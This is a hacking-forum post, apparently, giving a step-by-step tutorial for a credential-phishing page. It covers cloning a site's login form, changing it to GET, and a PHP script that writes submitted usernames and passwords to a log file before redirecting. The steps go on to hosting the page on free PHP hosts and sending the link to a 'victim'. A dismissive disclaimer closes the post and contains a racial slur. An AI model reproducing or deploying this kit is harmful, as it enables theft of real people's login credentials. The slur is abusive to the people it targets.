Sign in to follow this  
mesvak

HOW to make legit skempage kappa

Recommended Posts

[hide]

1- Open up the site that you want to make the fake page from it, 
after the load right click and save the page as "web page complete"

2- Now open that page with notepad, and press control+F to access search bar, 
and then search "login"

3- Behind the word "login" it's written .action, 
we don't need those so delete everything behind the login (this tutorial is for PHP, 
may you see login.aspx)

4- If you saw method="post" change it to method="GET"  
   
5- Ok now save it as .html

6- Open a new notepad, and write this commands on it:

<?php
header ('Location:target.com');
$handle = fopen("log.txt", "a");

foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

7- Instead of Location: target.com, write your login page address! 

8- Now save this as Login.PHP

9- Go to website's that offer free hosts

https://www.000webhost.com/free-php-hosting
https://www.awardspace.com/
https://infinityfree.net/

10- Make an account, get your host and upload both of files! 

11- After that you only need to give your HTML link to your victim!

12- If he opened and write his Login information you can access it!

13- If you look at PHP source, you can see log.txt that's where your victim info's saved.

This Thread is just for raising your information, and I do not accept responsibility for your misuse.kappa u niggers dont use it for shitty gae af assshits thats what im saying

 

 

 

[/hide]

Share this post


Link to post
Share on other sites

Let's check it out.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this